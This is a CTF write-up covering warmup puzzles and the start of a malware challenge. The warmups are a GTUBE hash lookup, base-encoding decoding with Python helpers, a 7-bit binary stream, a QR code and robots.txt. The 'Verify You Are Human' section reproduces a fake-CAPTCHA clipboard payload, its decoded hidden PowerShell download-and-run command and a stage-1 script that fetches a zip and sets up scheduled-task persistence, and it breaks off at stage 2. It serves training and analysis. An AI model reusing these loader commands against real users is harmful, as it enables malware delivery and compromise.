Completion Certificate

Day 01

Spam Test

Category: 👶 Warmups
Author: John Hammond

Challenge Prompt

Time to do some careful Googling… what’s the MD5 hash of the Generic Test for Unsolicited Bulk Email (GTUBE) string?

Submit the hash wrapped within the flag{ prefix and } suffix to match the standard flag format.

Solution

A Google search for Generic Test for Unsolicited Bulk Email returns the GTUBE Wikipedia page, which contains a table of hash values of the GTUBE string.

XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X

The MD5 hash is 6a684e1cdca03e6a436d182dd4069183.

flag{6a684e1cdca03e6a436d182dd4069183}

Cover All Your Bases

Category: 👶 Warmups
Author: John Hammond

Challenge Prompt (Base 2)

Can you make sense of all the different data below? Each one has a different representation!

Uncover the appropriate plaintext and submit the flags below! Do you know what all these ones and zeros mean?

01000111 01110010 01100101 01100001 01110100 00100000 01110111 01101111 01110010 01101011 00100001 
00100000 01010100 01101000 01100001 01110100 00100000 01110111 01100001 01110011 00100000 01000010 
01100001 01110011 01100101 00100000 00110010 00101100 00100000 01100010 01100101 01110100 01110100 
01100101 01110010 00100000 01101011 01101110 01101111 01110111 01101110 00100000 01100001 01110011 
00100000 01100010 01101001 01101110 01100001 01110010 01111001 00101110 00100000 01001001 01110100 
00100000 01101111 01101110 01101100 01111001 00100000 01110101 01110011 01100101 01110011 00100000 
01110100 01110111 01101111 00100000 01110011 01111001 01101101 01100010 01101111 01101100 01110011 
00111010 00100000 00110000 00100000 01100001 01101110 01100100 00100000 00110001 00101100 00100000 
01110111 01101000 01101001 01100011 01101000 00100000 01101101 01100001 01101011 01100101 01110011 
00100000 01101001 01110100 00100000 01100101 01100001 01110011 01111001 00100000 01110100 01101111 
00100000 01110011 01110000 01101111 01110100 00101110 00100000 01000001 01101110 01111001 01110111 
01100001 01111001 00101100 00100000 01101000 01100101 01110010 01100101 00100111 01110011 00100000 
01111001 01101111 01110101 01110010 00100000 01100110 01101100 01100001 01100111 00111010 00100000 
01100110 01101100 01100001 01100111 01111011 00110110 00110111 00111000 01100001 01100011 00110100 
00110101 00110100 00111000 00110111 01100011 00111001 00111000 00110110 00110010 01100001 00110110 
01100011 00110010 01100011 00110000 00110000 01100001 00110001 01100001 01100110 01100110 01100101 
01100100 00111001 01100100 01100011 01111101

Solution (Base 2)

Given the title of the challenge, and the format of the data, this appears to be binary encoded, or base 2. Decoding the data returns the following message, which includes the flag.

Great work! That was Base 2, better known as binary. It only uses two symbols: 0 and 1, which makes it easy to spot. Anyway, here's your flag: flag{678ac45487c9862a6c2c00a1affed9dc}
flag{678ac45487c9862a6c2c00a1affed9dc}

Challenge Prompt (Base 8)

Hmmm, a group of triplets, it looks like. Can you find out what they are trying to say?

116 151 143 145 154 171 040 144 157 156 145 041 040 124 150 141 164 040 167 141 163 040 102 141 163 
145 040 070 054 040 157 162 040 157 143 164 141 154 056 040 111 164 040 165 163 145 163 040 144 151 
147 151 164 163 040 060 055 067 054 040 141 156 144 040 157 146 164 145 156 040 163 150 157 167 163 
040 165 160 040 151 156 040 146 151 154 145 040 160 145 162 155 151 163 163 151 157 156 163 040 157 
156 040 114 151 156 165 170 056 040 123 160 157 164 040 151 164 040 167 150 145 156 040 156 165 155 
142 145 162 163 040 150 141 166 145 040 154 145 141 144 151 156 147 040 060 163 056 040 110 145 162 
145 047 163 040 171 157 165 162 040 146 154 141 147 072 040 146 154 141 147 173 146 145 065 070 060 
145 060 065 145 065 062 067 146 062 060 064 062 061 062 071 060 066 060 065 070 060 071 143 141 145 
143 071 175

Solution (Base 8)

This data appears to be octal encoded, or base 8. Decoding the data returns the following message, which includes the flag.

Nicely done! That was Base 8, or octal. It uses digits 0-7, and often shows up in file permissions on Linux. Spot it when numbers have leading 0s. Here's your flag: flag{fe580e05e527f20421290605809caec9}
flag{fe580e05e527f20421290605809caec9}

Challenge Prompt (Base 10)

These numbers look familiar… but how could they be represented as text?

089 111 117 032 099 114 097 099 107 101 100 032 105 116 033 032 084 104 097 116 032 119 097 115 032 
066 097 115 101 032 049 048 044 032 111 117 114 032 101 118 101 114 121 100 097 121 032 100 101 099 
105 109 097 108 032 115 121 115 116 101 109 046 032 073 116 032 114 117 110 115 032 102 114 111 109 
032 048 045 057 032 097 110 100 032 108 111 111 107 115 032 108 105 107 101 032 110 111 114 109 097 
108 032 110 117 109 098 101 114 115 046 032 069 097 115 121 032 116 111 032 105 100 101 110 116 105 
102 121 033 032 089 111 117 114 032 102 108 097 103 058 032 102 108 097 103 123 055 100 049 101 098 
050 101 048 055 055 054 099 100 055 099 053 099 055 056 100 102 048 049 048 049 048 102 051 048 101 
053 048 125

Solution (Base 10)

This data appears to be decimal encoded, or base 10. Decoding the data returns the following message, which includes the flag.

You cracked it! That was Base 10, our everyday decimal system. It runs from 0-9 and looks like normal numbers. Easy to identify! Your flag: flag{7d1eb2e0776cd7c5c78df01010f30e50}
flag{7d1eb2e0776cd7c5c78df01010f30e50}

Challenge Prompt (Base 16)

These look like pairs! But these have weird letters in them?

41 77 65 73 6f 6d 65 20 6a 6f 62 21 20 54 68 61 74 20 77 61 73 20 42 61 73 65 20 31 36 2c 20 6f 72 
20 68 65 78 61 64 65 63 69 6d 61 6c 2e 20 49 74 20 75 73 65 73 20 30 2d 39 20 61 6e 64 20 41 2d 46 
2c 20 6f 66 74 65 6e 20 77 69 74 68 20 70 72 65 66 69 78 65 73 20 6c 69 6b 65 20 30 78 2e 20 43 6f 
6d 6d 6f 6e 20 69 6e 20 6d 65 6d 6f 72 79 20 64 75 6d 70 73 20 61 6e 64 20 63 6f 6c 6f 72 20 63 6f 
64 65 73 2e 20 48 65 72 65 20 69 73 20 79 6f 75 72 20 66 6c 61 67 3a 20 66 6c 61 67 7b 64 33 63 62 
32 62 65 33 65 34 65 34 61 38 66 35 31 37 64 39 63 35 63 65 34 33 37 32 62 30 62 37 7d

Solution (Base 16)

This data appears to be hexadecimal encoded, or base 16. Decoding the data returns the following message, which includes the flag.

Awesome job! That was Base 16, or hexadecimal. It uses 0-9 and A-F, often with prefixes like 0x. Common in memory dumps and color codes. Here is your flag: flag{d3cb2be3e4e4a8f517d9c5ce4372b0b7}
flag{d3cb2be3e4e4a8f517d9c5ce4372b0b7}

Challenge Prompt (Base 32)

Uppercase letters and digits in a long stream… notice anything about the padding?

I5XW6ZBAO5XXE2ZBEBKGQYLUEB3WC4ZAIJQXGZJAGMZCYIDPMZ2GK3RAOVZWKZBA
NFXCAR3PN5TWYZJAIF2XI2DFNZ2GSY3BORXXEIDLMV4XGLRAJF2CA5LTMVZSAQJN
LIQGC3TEEAZC2NZOEBEWMIDZN52SA43FMUQGY33UOMQG6ZRAOVYHAZLSMNQXGZJA
NRSXI5DFOJZSAYLOMQQGI2LHNF2HGLBAORUGS3TLEBBGC43FGMZC4ICHMV2CA5DI
MF2CAZTMMFTSCIDGNRQWO6ZZMJRDKYTCHBSWCNJQHBRGGZTCMM2TCYTEGVSTCMLF
MZRDEOLDMN6Q====

Solution (Base 32)

Following the same pattern as the previous solutions, this data appears to be encoded using a different base. The lack of lowercase characters and limited range of numbers, in addition to the padding (=) at the end, suggest this may be base 32. Decoding the data returns the following message, which includes the flag.

Good work! That was Base 32, often used in Google Authenticator keys. It uses A-Z and 2-7. If you see lots of uppercase letters and digits, think Base32. Get that flag! flag{9bb5bb8ea508bcfbc51bd5e11efb29cc}
flag{9bb5bb8ea508bcfbc51bd5e11efb29cc}

Challenge Prompt (Base 45)

A mixed alphabet with symbols. What is this one supposed to be?

K19X CSUEWQE24EBWE3/DK848UAIECV44HECN34HECDZC0R61Q57%E  CH44M-DSCAB44V3E6$CE4404
EQ34CYA8T8D3D3WE5UD-M8*+APR8IN85LEREDOEDIEC6$CI$5*C9T44LQE.OEOCCJ$DH8FX3EK447$C7
WE4LE1Q5AVCD3DLWE1Q5CECRTC-QEC$D*3EBPEU34SUE*VD%3E.OEKFE*EDIQDA448%EC44Z CV3E6$C
B44TVDCEC4WDI$5Y69O/E944E44PVDV1DE44PVDV3DVICYJCI-C4:6846:/6A46YICJOCGM64ECYJCKA
7YJC2R6J-CZ2

Solution (Base 45)

Again, following the same pattern, the additional characters suggest this is base encoded with a higher radix. Base 45 is another common encoding. Decoding the data returns the following message, which includes the flag.

Great spotting! That was Base 45, used in QR codes for EU Digital COVID Certificates. It uses a mix of letters, digits, and symbols. It looks quirky but decodes cleanly. Have a flag! flag{b5bef376027104b8c73dafbe95be47f4}
flag{b5bef376027104b8c73dafbe95be47f4}

Challenge Prompt (Base 64)

Compact and common on the wire… does the ending give you a clue?

V2VsbCBkb25lISBUaGF0IHdhcyBCYXNlIDY0LCBzdXBlciBjb21tb24gZm9yIGVuY29kaW5nIGRh
dGEgaW4gZW1haWwgYW5kIHdlYiB0cmFmZmljLiBMb29rIGZvciBBLVosIGEteiwgMC05LCBwbHVz
ICsgYW5kIC8sIGFuZCBzb21ldGltZXMgdGhlIHBhZGRpbmcgPSBzaWducyBhdCB0aGUgZW5kLiBG
bGFnOiBmbGFne2NkMDE2NGZmNjQ3MjZmMjk3MmIyZDhmMmFjMDExOWRifQ==

Solution (Base 64)

Given the prompt for this challenge, this data is most likely base 64 encoded. Decoding the data returns the following message, which includes the flag.

Well done! That was Base 64, super common for encoding data in email and web traffic. Look for A-Z, a-z, 0-9, plus + and /, and sometimes the padding = signs at the end. Flag: flag{cd0164ff64726f2972b2d8f2ac0119db}
flag{cd0164ff64726f2972b2d8f2ac0119db}

Challenge Prompt (Base 85)

This variant often shows special markers. See anything bracketing the data?

<~:2+3L+EqaECEXg"BOQ!*G@>P86=FqH+?250+EqL5@qZupDf'',+DG^9A8,XfATD@"F<Ga8EbSs"FE9
&W<+ohc6"FnCAM6>j@qfX:2'@'NEbSs"F<G^IF^]*&Gp%0M@<-I2+EqOABHTEd+CT.u+D#G$F!,[@FD)
eG4t[sWBOr;a7RJ:Q3ANE6G%#E*@;^00F`V,8+CQC%Ec5AsATAo%CiF&r@V'X(.!]`R+DkP4+EM+*+Cf
(nEa`I"ATDi7Ch[Zr+FYja?n<FI/0JkO+FP[k+A$/fH#IhG+Co%nDe*F"+Cf>,E,8rsDK?q/@W-C2+DG
_:@;KXg+EMgF@W-((/0K"XBlmiu+EV:.+@9LXAN2OiG%#E*@;^0>+@^0UB0%/ICggt'@5K\q@:_,Q2D[
<IA2uM-1h/C&AN)S+@P_LS2.U<.I/~>

Solution (Base 85)

The additional characters in this data suggest this may be base 85. Decoding the data returns the following message, which includes the flag.

Nice work! That was Base 85, which comes in different variants. The Adobe/Ascii85 variant usually starts with <~ and ends with ~>. The RFC 1924 variant uses a broader alphabet (you may see characters like ~, `, {, or }). If your decoder complains about invalid symbols, switch the Base85 variant. Flag: flag{a414ae096381d9594c58e785b3c95dfb}
flag{a414ae096381d9594c58e785b3c95dfb}

Challenge Prompt (Base 92)

This noisy alphabet is picky about whitespace… formatting might matter!

@D_<sB5GVmj-;A[GD:PIptd9#KgRoG![3\gx4mcIUAiYA8M=E_=UOU5S$HqE$p<KHnvkV66}Q?tqB]P)
Dy\4O\cT$^qE;BG\LX&pVXaZ$Tq0,'1:I3jzOY4Rs}8iY(1.GjE2RDb#yuj-*n10I1S\d:W-#pm0',!e
D:H4sK'c@^jAiC%1K}1^V65i/Upa*U(mEU'(Va'b/nt_*vgYH.^_V_Td5AgNoIWlD9jvOZ3oKhm/WwX+
-GHriuce$TlHB+#)E]kGisTc:ehwoA<RF;gx-ld->om0iC&$I3SXV_'bF.gOk[#-H,1kv93JUpCu&I-r
4c^^pu+!?9iXkKdk6,1cPeWN.@E?CO

Solution (Base 92)

The additional characters and note about whitespace suggest this may be base 92. Attempting to decode the data using CyberChef initially fails with an error message about \n being an invalid base 92 character. After updating the recipe to remove these characters and decode the data, the resulting decoded message includes the flag.

Very nice! That was Base 92. Many decoders do not ignore whitespace, so you may need to remove line breaks before decoding. Tip: Base92 uses a wide printable set but excludes spaces and newlines; strip them before decoding. Here is another flag: flag{0c97042d855d7b353dc87c91ea902129}
flag{0c97042d855d7b353dc87c91ea902129}

Challenge Prompt (Base 65536)

The data below looks super weird! Don’t panic if your editor can’t render every symbol. Can you tell what it is?

๐–ก…้ฉฃ๊ฌ๐™ฅๅ•ด๐’ชๅ™ข่ค ้™จๅ•ด้™ทๅ•ณ้™‚้ฉณๆฌ ๆจตๆฌณๅ”ฌ้ตท้กฉๅ•จ้™ฃๅ•ฎ้™ญๅ•ฐ๐’ด๐˜ ้™ฅ๊ฒๅ•น๐”‘ฅ๐“ฅๅ•น๐™•้กฉ้ฅฏๅ•ฅ้ตฃ๐“ก้กก้ฉดๆฒ็ธ ๅ•ฆ๐’นๅ•ต้ฉณๅ•ฅ้นท้ฅฌ๊” ๐–กฉ๐“…ฅ๐’€ ๅ•ฆ้ฅฏๅ•ค๊ง๐’…น๐“…จ
้˜ ้ฅฎ๐“„ ๊•น๐’ข๐“…ฌๅ”ฌ๐’นๅ•ต๐“กๅ•ฅ๐“ฐ้ฏ้ก๐–ฅฌ๊Œ ๐’ฏ้นซ้ฑฎ้˜ ๅ•ด้ตด๐“…ฉๅ”ฎ้ฉˆ้ฉฒ้ธ ๅ•ณ๐’น๐“ต้ฌ ๐™ฉ๊ก้ฌ ้™ฌๆฝง้ฌ ้™ฌ๐ …งๆจดๆ˜ทๆคท้คต้ฅฃ้คดๆฌฑๆตฆๆญคๆ•ฆๆฑก้ฅฆ้ญกๆ˜ทๆœต้ ธแ•ฝ

Solution (Base 65536)

This challenge required some extra searching around for the solution, but continuing with the theme of the previous challenges, the data is encoded using the more obscure base 65536 encoding. Decoding the data using an online decoder returns the following message, which includes the flag.

Excellent job! That was Base 65536, which can map to nearly every Unicode character. If you see wild mixes of odd glyphs and symbols, you are probably looking at this. Here is your final flag: flag{4571745dcd4d16f8d6f0a7fdaf71528c}
flag{4571745dcd4d16f8d6f0a7fdaf71528c}
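The prompts above identify each representation by its alphabet (two symbols for binary, triplets of 0-7 for octal, pairs with a-f for hex, A-Z and 2-7 with = padding for Base32, <~ and ~> framing for Ascii85, and so on). The following added example is not part of the challenge or the writeup; it turns those hints into a small guess-and-decode helper using only the Python standard library. The short numeric samples are excerpts of the encoded data shown above; the Base32 and Base85 samples are constructed from the string flag{test}. It joins lines before decoding, which is the same fix the Base 92 solution needed for decoders that reject whitespace.

```python
import base64
import re

# Added example, not part of the challenge or the writeup's own tooling: a small
# "which base is this?" helper built from the alphabet hints the prompts give.
# SAMPLES entries marked "excerpt" are short pieces of the encoded data above;
# the base32/base85 entries are constructed here from the string "flag{test}".


def decode_groups(text: str, base: int) -> bytes:
    """Decode whitespace-separated numeric groups, one byte per group, in `base`."""
    return bytes(int(group, base) for group in text.split())


def guess_base(text: str):
    """Guess the representation from its alphabet and shape.

    Returns 2, 8, 10, 16, 32, 64, 85 or None. The order of the checks matters:
    octal is tested before decimal, so decimal data that happens to use only the
    digits 0-7 is reported as octal, and an all-uppercase Base64 blob would be
    reported as Base32. Treat the guess as a starting point and inspect the output.
    """
    groups = text.split()
    if not groups:
        return None
    body = "".join(groups)  # decoders such as Base92's reject line breaks, so join first
    if all(re.fullmatch(r"[01]{8}", g) for g in groups):
        return 2
    if all(re.fullmatch(r"[0-7]{3}", g) for g in groups):
        return 8
    if all(re.fullmatch(r"[0-9]{3}", g) for g in groups):
        return 10
    if all(re.fullmatch(r"[0-9a-fA-F]{2}", g) for g in groups):
        return 16
    if body.startswith("<~") and body.endswith("~>"):
        return 85  # Adobe/Ascii85 framing
    if re.fullmatch(r"[A-Z2-7]+=*", body):
        return 32
    if re.fullmatch(r"[A-Za-z0-9+/]+=*", body):
        return 64
    return None


def decode_any(text: str) -> bytes:
    """Guess the base, then decode with the standard library."""
    base = guess_base(text)
    body = "".join(text.split())
    if base in (2, 8, 10, 16):
        return decode_groups(text, base)
    if base == 32:
        return base64.b32decode(body)
    if base == 64:
        return base64.b64decode(body)
    if base == 85:
        return base64.a85decode(body, adobe=True)
    raise ValueError("unrecognised encoding; try another variant or strip whitespace")


SAMPLES = {
    "binary": "01000111 01110010 01100101 01100001 01110100",        # excerpt, "Great"
    "octal": "116 151 143 145 154 171",                              # excerpt, "Nicely"
    "decimal": "089 111 117",                                        # excerpt, "You"
    "hex": "41 77 65 73 6f 6d 65",                                   # excerpt, "Awesome"
    "base64": "V2VsbCBkb25lISBUaGF0",                                # excerpt, "Well done! That"
    "base32": base64.b32encode(b"flag{test}").decode(),              # constructed
    "base85": base64.a85encode(b"flag{test}", adobe=True).decode(),  # constructed
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:8s} base {guess_base(sample)!s:>4} -> {decode_any(sample)!r}")
```

Base 45, Base 92 and Base 65536 have no standard-library decoder, so they still go through CyberChef or a dedicated library; the guess order here is the main thing to adjust when a blob decodes to garbage.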

Just a Little Bit

Category: 👶 Warmups
Author: John Hammond

Challenge Prompt

If just a little bit were to go missing… would it really even matter?

11001101101100110000111001111111011011001011000110110011011001111000110110001011011001110011100001
11001011100010110010011001100110010110010111001010110011011000111001010110011011100001110010110101
1100100011010101110010110110011011011001000111001011001111001101111101

Solution

Typically, binary encoded data uses 8 bits to represent each byte. Attempting to decode the data as binary with a standard byte length of 8 bits results in garbled output.

รยณlยฑยณgยย‹g8rรขร‰ย™ย–\ยฌร˜รฅfรกร‹\ย\ยถmย‘ร‹<รŸ

The prompt for this challenge, however, suggests a bit or several bits are missing from the binary encoded data. Attempting to decode the data using CyberChef, this time using a byte length of 7 bits, reveals the flag.

flag{2c33c169aebdf2ee31e3895d5966d93f}
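The "missing bit" is the byte width: the stream is 266 bits long, which divides by 7 but not by 8, so an 8-bit read leaves two bits over and shifts every character. The following added example, not part of the writeup, automates the check described above: it decodes the challenge's bit stream at several candidate widths and picks the one that both divides the length exactly and yields printable text. BITS is the data from the prompt; the scoring heuristic is this example's own.

```python
import string

# Added example (not the challenge's own tooling): brute-force the bit width of an
# unseparated bit stream. BITS is the challenge data from the prompt above.
BITS = (
    "11001101101100110000111001111111011011001011000110110011011001111000110110001011011001110011100001"
    "11001011100010110010011001100110010110010111001010110011011000111001010110011011100001110010110101"
    "1100100011010101110010110110011011011001000111001011001111001101111101"
)

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decode_bits(bits: str, width: int) -> bytes:
    """Cut the stream into `width`-bit chunks and turn each into one byte.
    Whitespace is ignored and a trailing partial chunk is dropped."""
    bits = "".join(bits.split())
    return bytes(int(bits[i:i + width], 2) for i in range(0, len(bits) - width + 1, width))


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII; 1.0 for clean text."""
    if not data:
        return 0.0
    return sum(chr(b) in PRINTABLE for b in data) / len(data)


def find_bit_width(bits: str, widths=(8, 7, 6, 5)):
    """Try each candidate width and return (width, decoded) for the best-scoring one.
    A width that divides the stream length exactly gets a bonus: a genuine 7-bit
    stream has no leftover bits, while reading it as 8-bit leaves a remainder."""
    cleaned = "".join(bits.split())
    best = None
    for width in widths:
        data = decode_bits(cleaned, width)
        score = printable_ratio(data) + (0.5 if len(cleaned) % width == 0 else 0.0)
        if best is None or score > best[0]:
            best = (score, width, data)
    return best[1], best[2]


if __name__ == "__main__":
    print("8-bit:", decode_bits(BITS, 8))  # garbled, with 2 bits left over
    width, data = find_bit_width(BITS)
    print(f"{width}-bit:", data.decode("ascii"))
```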

QRception

Category: 👶 Warmups
Author: John Hammond

Challenge Prompt

Wow, that’s a big QR code! I wonder what it says!

QR code

Solution

Parsing the QR code above with CyberChef, with the output encoding set to UTF-8 so that the block characters render properly, results in the following QR code.


█████████████████████████████████████
█████████████████████████████████████
████ ▄▄▄▄▄ █ ██▀▀▀▀▄█▀█▀ █ ▄▄▄▄▄ ████
████ █   █ █  ▀█ ▀▀ ▄▄█▄▄█ █   █ ████
████ █▄▄▄█ █▀  █▄▀█▄▀██▀██ █▄▄▄█ ████
████▄▄▄▄▄▄▄█▄█ ▀▄█ ▀ ▀▄█ █▄▄▄▄▄▄▄████
████▄▄▀▀ ▄▄█▀█▄█▄▄  ▄▄▀▄▄▀▀▄▀▄ ▄ ████
████▀ ▀▄██▄   ▄█▀▄█▄▄▀▄▀▀▄▄▀█ ▄█ ████
████ ▄▀▀  ▄▄█▀▀▄▀▄ ▀▄▄▄▄▄▀▀▄▀▀██▀████
████▀ ▀▀▄▄▄▀▄▄█ ▄ ▄ ▀ █▀█ ▀▄▄ ▄▀ ████
████ █▄▀▀▄▄▄█▄██▄ ▀ ▄▄▄▄▄▄▀▀▀▄▀▄ ████
██████  ██▄▀▄▀ █▀█▀▄▀▀ █ ▀▄█▄▄█▀▄████
████▄▄▄██▄▄▄▀▄ ▄▀▄▄▀▀▄▀▄ ▄▄▄ ▀▀▄▀████
████ ▄▄▄▄▄ █▀█  ▄ ▄ ▀▀▀▄ █▄█ ▄██▄████
████ █   █ █▄███▄ ▀▀▀▄▀  ▄▄ ▄█▀▄▀████
████ █▄▄▄█ █▀▀ █▀█▀ █ ▄▀ ▀█ ███  ████
████▄▄▄▄▄▄▄█▄██▄█▄▄██▄█▄▄██████▄█████
█████████████████████████████████████
█████████████████████████████████████

Taking a screenshot of this QR code and parsing it with CyberChef reveals the flag.

flag{e1487f138f885bfef64f07cdeac96908}

RFC 9309

Category: 👶 Warmups
Author: John Hammond

Challenge Prompt

Sorry. You know every CTF has to have it. 🤷

๐Ÿ–ฅ๏ธ RFC 9309 - 10.1.149.237

Solution

RFC 9309 defines the “Robots Exclusion Protocol”, which websites implement by publishing a file named robots.txt containing rules for crawlers. The RFC specifies the syntax of those rules.

At first glance, the file fetched from http://10.1.149.237/robots.txt appears to be a normal robots.txt containing a basic disallow rule.

User-Agent: *
Disallow: /

These rules, however, are followed by a tremendous amount of whitespace. The flag is hidden about halfway through the file, preceded by a long run of spaces. It can be extracted by searching for it in the browser, or with curl and grep.

curl -s "http://10.1.149.237/robots.txt" | grep -oE "flag\{[a-z0-9]{32}\}"
flag{aec1142c199aa5d8ad0f3ae3fa82e13c}

Verify You Are Human

Category: 🐞 Malware
Author: John Hammond

Challenge Prompt

My computer said I needed to update MS Teams, so that is what I have been trying to do…

…but I can’t seem to get past this CAPTCHA!

CAUTION

This is the Malware category. Please be sure to approach this challenge material within an isolated virtual machine.

NOTE

Some components of this challenge may be finicky with the browser-based connection. You can still achieve what you need to, but there may be a few more steps than if you were to approach this over the VPN.

(i.e., “remove the port” when you need to… you’ll know what I mean 😜)

๐Ÿ–ฅ๏ธ Verify You Are Human - 10.1.178.152

Solution

Navigating to the webpage for the challenge reveals the CAPTCHA page shown below.

CAPTCHA page

Clicking the CAPTCHA displays the following instructions. The clipboard likely contains a command that is intended to be executed.

CAPTCHA page

Viewing the page source reveals the base64-encoded payload that is copied to the clipboard.

unsecuredCopyToClipboard(decodeURIComponent(escape(atob("IkM6XFdJTkRPV1Ncc3lzdGVtMzJcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxQb3dlclNoZWxsLmV4ZSIgLVdpIEhJIC1ub3AgLWMgIiRVa3ZxUkh0SXI9JGVudjpMb2NhbEFwcERhdGErJ1wnKyhHZXQtUmFuZG9tIC1NaW5pbXVtIDU0ODIgLU1heGltdW0gODYyNDUpKycuUFMxJztpcm0gJ2h0dHA6Ly8xMC4xLjE3OC4xNTIvP3RpYz0xJz4gJFVrdnFSSHRJcjtwb3dlcnNoZWxsIC1XaSBISSAtZXAgYnlwYXNzIC1mICRVa3ZxUkh0SXIi"))));

Stage 0

The command below is the decoded payload that the fake CAPTCHA copies to the clipboard. It launches a new PowerShell process with a hidden window and no profile. That process downloads a second PowerShell script, saves it in the current user’s local app data folder under a random numeric file name, and runs it with the execution policy bypassed.

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Wi HI -nop -c "$UkvqRHtIr=$env:LocalAppData+'\'+(Get-Random -Minimum 5482 -Maximum 86245)+'.PS1';irm 'http://10.1.178.152/?tic=1'> $UkvqRHtIr;powershell -Wi HI -ep bypass -f $UkvqRHtIr"
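The page's JavaScript wraps the payload as decodeURIComponent(escape(atob(...))), which is the browser idiom for "base64, then UTF-8". The following added example is not part of the challenge files or the writeup: it performs the same decode in Python on the base64 blob from the page source and pulls out the indicators a triage note needs (download URL, binary launched, and the hidden-window, no-profile, policy-bypass and download-cradle switches). The regular expressions are this example's own and cover only the switch spellings seen here plus their long forms.

```python
import base64
import re

# Added example (not from the challenge files): reproduce what the page's
# decodeURIComponent(escape(atob(...))) call does, which is base64 followed by a
# UTF-8 decode, and pull the indicators a triage note needs out of the result.
# PAYLOAD is the base64 blob from the page source above, re-wrapped for readability.
PAYLOAD = (
    "IkM6XFdJTkRPV1Ncc3lzdGVtMzJcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxQb3dlclNoZWxsLmV4ZSIg"
    "LVdpIEhJIC1ub3AgLWMgIiRVa3ZxUkh0SXI9JGVudjpMb2NhbEFwcERhdGErJ1wnKyhHZXQtUmFuZG9t"
    "IC1NaW5pbXVtIDU0ODIgLU1heGltdW0gODYyNDUpKycuUFMxJztpcm0gJ2h0dHA6Ly8xMC4xLjE3OC4x"
    "NTIvP3RpYz0xJz4gJFVrdnFSSHRJcjtwb3dlcnNoZWxsIC1XaSBISSAtZXAgYnlwYXNzIC1mICRVa3Zx"
    "Ukh0SXIi"
)


def decode_clipboard_payload(b64: str) -> str:
    """Base64, then UTF-8: the Python equivalent of decodeURIComponent(escape(atob(x)))."""
    return base64.b64decode(b64).decode("utf-8")


def extract_indicators(command: str) -> dict:
    """Pick out the pieces of a decoded one-liner that a defender records and hunts for:
    the download URL, the binary launched, and the PowerShell switches that hide the
    window, skip the profile and bypass the execution policy."""
    flags = re.IGNORECASE
    return {
        "urls": re.findall(r"https?://[^\s'\"<>]+", command),
        "executables": re.findall(r'[A-Za-z]:\\[^"]+?\.exe', command),
        "hidden_window": bool(re.search(r"-Wi(?:ndowStyle)?\s+H(?:idden|I)\b", command, flags)),
        "no_profile": bool(re.search(r"-nop(?:rofile)?\b", command, flags)),
        "policy_bypass": bool(re.search(r"-e(?:p|xecutionpolicy)\s+bypass\b", command, flags)),
        "download_cradle": bool(re.search(r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b", command, flags)),
    }


if __name__ == "__main__":
    command = decode_clipboard_payload(PAYLOAD)
    print(command)
    for key, value in extract_indicators(command).items():
        print(f"{key:16s} {value}")
```

The URL and executable path go straight into the IOC list; the three boolean switches are the combination worth alerting on in process-creation telemetry, since a hidden-window PowerShell with the execution policy bypassed and a download cradle is rarely legitimate when its parent is explorer.exe after a clipboard paste into the Run dialog.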

Stage 1

This stage downloads a zip file containing a Python interpreter and a compiled Python script. A scheduled task is registered to run the script 180 seconds later, and the script is also executed immediately.

curl 'http://10.1.178.152/?tic=1' > stage1.ps1
# stage1.ps1

$JGFDGMKNGD = ([char]46)+([char]112)+([char]121)+([char]99);
$HMGDSHGSHSHS = [guid]::NewGuid();
$OIEOPTRJGS = $env:LocalAppData;

# Download next stage; save with pdf extension
irm 'http://10.1.178.152/?tic=2' -OutFile $OIEOPTRJGS\$HMGDSHGSHSHS.pdf;

# Extract zip to local app data
Add-Type -AssemblyName System.IO.Compression.FileSystem;
[System.IO.Compression.ZipFile]::ExtractToDirectory("$OIEOPTRJGS\$HMGDSHGSHSHS.pdf", "$OIEOPTRJGS\$HMGDSHGSHSHS");

$PIEVSDDGs = Join-Path $OIEOPTRJGS $HMGDSHGSHSHS;
$WQRGSGSD = "$HMGDSHGSHSHS";
$RSHSRHSRJSJSGSE = "$PIEVSDDGs\pythonw.exe";
$RYGSDFSGSH = "$PIEVSDDGs\cpython-3134.pyc";
$ENRYERTRYRNTER = New-ScheduledTaskAction -Execute $RSHSRHSRJSJSGSE -Argument "`"$RYGSDFSGSH`"";
$TDRBRTRNREN = (Get-Date).AddSeconds(180);
$YRBNETMREMY = New-ScheduledTaskTrigger -Once -At $TDRBRTRNREN;
$KRYIYRTEMETN = New-ScheduledTaskPrincipal -UserId "$env:USERNAME" -LogonType Interactive -RunLevel Limited;
Register-ScheduledTask -TaskName $WQRGSGSD -Action $ENRYERTRYRNTER -Trigger $YRBNETMREMY -Principal $KRYIYRTEMETN -Force;
Set-Location $PIEVSDDGs;
$WMVCNDYGDHJ = "cpython-3134" + $JGFDGMKNGD;
Rename-Item -Path "cpython-3134" -NewName $WMVCNDYGDHJ;

# Execute cpython-3134.pyc
iex ('rundll32 shell32.dll,ShellExec_RunDLL "' + $PIEVSDDGs + '\pythonw" "' + $PIEVSDDGs + '\'+ $WMVCNDYGDHJ + '"');

Remove-Item $MyInvocation.MyCommand.Path -Force;
Set-Clipboard

Stage 2

The downloaded zip file also contains output.py, which is the source of the compiled Python script, cpython-3134.pyc.

curl 'http://10.1.178.152/?tic=2' > stage2.zip
unzip stage2.zip -d ./stage2

This script decodes and executes another Python script.

# output.py

import base64
#nfenru9en9vnebvnerbneubneubn
